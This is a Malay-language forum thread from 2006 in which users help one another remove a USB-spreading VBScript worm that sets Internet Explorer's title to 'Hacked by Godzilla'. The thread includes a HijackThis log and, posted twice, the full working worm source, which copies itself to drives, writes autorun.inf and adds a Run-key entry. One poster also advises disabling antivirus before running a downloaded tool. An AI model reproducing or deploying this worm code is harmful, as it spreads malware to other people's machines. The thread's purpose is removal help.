Wscript..

[slaughters 1]

wscript.. aku tak tau aa nak buat camner dah.. aku pakai AV Avast.. takleh nak kill or detect automatik mende nie.. ni pasal ravmon aa.. kita klik kat patition.. then takleh nak masuk.. right click baru bleh.. nak delete fail autorun.inf tu.. kene kill process wscript tu....

apa yang patut aku buat aa ?

[scorps 1]

wscript.. aku tak tau aa nak buat camner dah.. aku pakai AV Avast.. takleh nak kill or detect automatik mende nie.. ni pasal ravmon aa.. kita klik kat patition.. then takleh nak masuk.. right click baru bleh.. nak delete fail autorun.inf tu.. kene kill process wscript tu....

apa yang patut aku buat aa ?

dah try masuk windows guna safe mode,

[slaughters 1]

dah try masuk windows guna safe mode,

untuk ape masuk safe mode ? actually process tu boleh di "kill".. tapi tu aa.. ermm.. aku nak tau camner nak carik "ibu" die.. hampes betul aa.. ehehe..

[blurruitm 0]

aku nak tau camner nak carik "ibu" die.. hampes betul aa.. ehehe..

selalunye vrus nie kau kane buang kt startup dl. pastu baru delete manual vrus 2.

cuba cari kat windows>system32.

xpn kat lam windows.

hati2 skit jangn slap delete plak jgn delete fail system sdah

[hampeh 21]

try pakai process explorer ngan process viewer ..download

kat http://www.microsoft.com/technet/sysinternals/default.mspx

[scorps 1]

untuk ape masuk safe mode ? actually process tu boleh di "kill".. tapi tu aa.. ermm.. aku nak tau camner nak carik "ibu" die.. hampes betul aa.. ehehe..

ko nak kill sajer ker ko nak delete terus??

klu ko kill saje,

lain kali ko reboot komp,process tu akan kembali lagii..

ke aku yg silap paham???

[alternat0r 0]

Acu cube try test Software antivirus yang aku buat nih... mana tau ada detect apa-apa lak kan... make sure turn off antivirus yang ada dulu lepas tu baru run program nih...

Download at: Server 1

[slaughters 1]

ko nak kill sajer ker ko nak delete terus??

klu ko kill saje,

lain kali ko reboot komp,process tu akan kembali lagii..

ke aku yg silap paham???

ermm.. aku cakap aku boleh kill process tu.. huhu.. camne boleh delete ke process tu ?

Acu cube try test Software antivirus yang aku buat nih... mana tau ada detect apa-apa lak kan... make sure turn off antivirus yang ada dulu lepas tu baru run program nih...

Download at: Server 1

ngko buat sendiri antivirus nie ? perghh.. ok.. aku try dulu.. anyway. thanks..

[001x0 0]

wscript.exe 'didaftarkan' sebagai Microsoft ® Windows Script Host

lokasi sepatutnya

C:\WINDOWS\system32\wscript.exe

Kalau nak activekan wscript.exe dan adjust sikit

dari Run -> taipkan wscript.exe -> Enable 'stop script after specified number of second'

Kalau sekadar nak Enable/Disable wscript.exe

download -> click untuk enable disable

http://www.symantec.com/avcenter/noscript.exe

* kalau nak delete mungkin boleh dalam safemode, tapi kesannya saya tak tahu

mungkin IE activeX, java script, vbscript, other windows component tak function

* Wscript.exe Csript.exesebahagian dari IE komponen kot

* perlu cari 'ibu' dia dulu nie, wscript.exe tak salah, Run Spybot & paste Hijackthis

[slaughters 1]

Logfile of HijackThis v1.99.1

Scan saved at 8:41:05 AM, on 12/11/2006

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\Explorer.EXE

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe

C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe

C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe

C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe

C:\Program Files\Mozilla Firefox\firefox.exe

C:\WINDOWS\system32\wuauclt.exe

C:\Documents and Settings\Administrator\Desktop\hijackthis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll

O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll

O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized

O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP

O8 - Extra context menu item: &Clean Traces - C:\Program Files\DAP\Privacy Package\dapcleanerie.htm

O8 - Extra context menu item: &Download with &DAP - C:\Program Files\DAP\dapextie.htm

O8 - Extra context menu item: Download &all with DAP - C:\Program Files\DAP\dapextie2.htm

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_09\bin\ssv.dll

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe

O11 - Options group: [iNTERNATIONAL] International*

O17 - HKLM\System\CCS\Services\Tcpip\..\{2F158875-931F-4DF7-BAF1-732836AEB8C9}: NameServer = 10.20.16.2,10.20.16.3

O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll

O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe

O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe

O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe

O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe

O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe

ermm.. ni hijackthis..

[HTM a.k.a. whiztech 0]

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

pc aku penah kene vbs nih..

ni code dia.. aku masih simpan dalam avast! virus chest...

'My name is Slow but sure V0.04
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

ko try search file MS32DLL.dll.vbs pastikan ko tick advanced option, search dalam subfolder, system folder ngan hidden files/folders... selalunya script ni lepak kat setiap local partition (C:\MS32DLL.dll.vbs, d:\MS32DLL.dll.vbs) ngan c:\windows\MS32DLL.dll.vbs kot..

kalau salah tolong betulkan..

[alternat0r 0]

Kalau ada sample boleh lah tolong uploadkan kat http://www.data0.net nanti aku tolong buat detection and removal...

[ApoNie 0]

Untuk keselamatan, baik xyah dedah code tu..

[alternat0r 0]

Aku dah update untuk Portable Antivirus bagi virus yang dinyatakan diatas... cuba scan dulu...

Download here...

[slaughters 1]

Aku dah update untuk Portable Antivirus bagi virus yang dinyatakan diatas... cuba scan dulu...

Download here...

bagus betul ngko nie.. ok.. aku try jap.. thanks !

[slaughters 1]

bagus betul ngko nie.. ok.. aku try jap.. thanks !

portable antivirus yang ngko buat ni bagus.. dapat detect.. tapi still takleh nak ilangkan hacked by godzilla!! camne aa nak buat! aku rasa kene buat satu thread yang bincangkan mende nie aa.. satu network aku dah kene.. hampes betul...

[unexistance 3]

da try pakai search? (*.vbs)

pastu, tengok kat mana die bubuh..

folder2 'ibu' yang biasa (ikut pengalaman):

1. hidden folder dalam c:\windows

2. c:\documents and settings\username\application data

3. c:\documents and settings\username\local settings\application data

4. c:\documents and settings\username\templates

p/s: tapi jangan main delete je, kang tak pasal2 tak boleh boot

tapi vbs file biasanya tak kritikal ke sistem, so boleh kate selamat la, tapi hati2..

[joetbg_x 0]

tapi still takleh nak ilangkan hacked by godzilla!!

ko tukar sendiri kat registry

HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

[slaughters 1]

ko tukar sendiri kat registry

HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

hoho.. hacked by Godzilla dah settle.. ehehe.. thanks..

[zareight 7]

aku pon kene gak..camne nih?partition xleh double click..xphmla cara korg ajar tu..

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

pc aku penah kene vbs nih..

ni code dia.. aku masih simpan dalam avast! virus chest...

'My name is Slow but sure V0.04
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

ko try search file MS32DLL.dll.vbs pastikan ko tick advanced option, search dalam subfolder, system folder ngan hidden files/folders... selalunya script ni lepak kat setiap local partition (C:\MS32DLL.dll.vbs, d:\MS32DLL.dll.vbs) ngan c:\windows\MS32DLL.dll.vbs kot..

kalau salah tolong betulkan..

camne nk bg partition pc bleh double click ar?com aku pon kene..

[alternat0r 0]

Download latest Portable Antivirus untuk detect virus jenis ni... Virus ni akan detect sebagai VBS/Slowbut.

Aku dah buat detection untuk 2 jenis variant serta sampah sarap yang ditinggalkan oleh virus nih... Kalau virus ni tengah running, PAV akan automatic terminate process yang sedang berjalan... Try dulu...

Don't worry, registry & perkataan 'H@cked by ...' pun akan automatic fixed...

[zareight 7]

da bleh da..thanks alternator n sape2 yg bantu...

Edited December 13, 2006 by zareight

[Impreza_2004 0]

wscript.exe

wscript.exe - Here is the scoop on Vbswg.Aq Worm as it pertains to computer network security. The big question: what is wscript.exe and is it spyware, a trojan and if so, how do I get rid of Vbswg.Aq Worm?

wscript.exe (Vbswg.Aq Worm) - Details

If a process named wscript.exe is running on your computer, you may have been infected with a strain of the Vbswg.Aq worm.

wscript.exe is considered to be a security risk, not only because antivirus programs flag Vbswg.Aq Worm as a virus, but also because a number of users have complained about its performance.

Vbswg.Aq Worm is likely a virus and as such, presents a serious vulnerability which should be fixed immediately! Delaying the removal of wscript.exe may cause serious harm to your system and will likely cause a number of problems, such as slow performance, loss of data or leaking private information to websites.

You should visit our free spyware removal page to make sure your system does not have other programs like wscript.exe.

WSCRIPT.EXE - Disclaimer

Every attempt has been made to provide you with the correct information for wscript.exe or VBSWG.AQ WORM. Many spyware/malware programs use filenames of usual, non-malware programs. If we have included information about wscript.exe that is inaccurate, we would greatly appreciate your help by updating the spy bot database and we'll promptly correct it.

You should verify the accuracy of information we provided about wscript.exe. Vbswg.Aq Worm may have had a status change since this page was published.

[firefolk 0]

try disable 1st

START > RUN > MSCONFIG > STARTUP tab.

[alternat0r 0]

wscript.exe

wscript.exe - Here is the scoop on Vbswg.Aq Worm as it pertains to computer network security. The big question: what is wscript.exe and is it spyware, a trojan and if so, how do I get rid of Vbswg.Aq Worm?

wscript.exe (Vbswg.Aq Worm) - Details

If a process named wscript.exe is running on your computer, you may have been infected with a strain of the Vbswg.Aq worm.

. . .

Pendek kata, wscript.exe tu untuk run fail Visual Basic Script... fail ni bukanlah virus, memang Microsoft provide dalam setiap Windows tapi ia boleh menyebabkan security risk (Low)...

Vbswg maksudnya Visual Basic Script Worm Generator.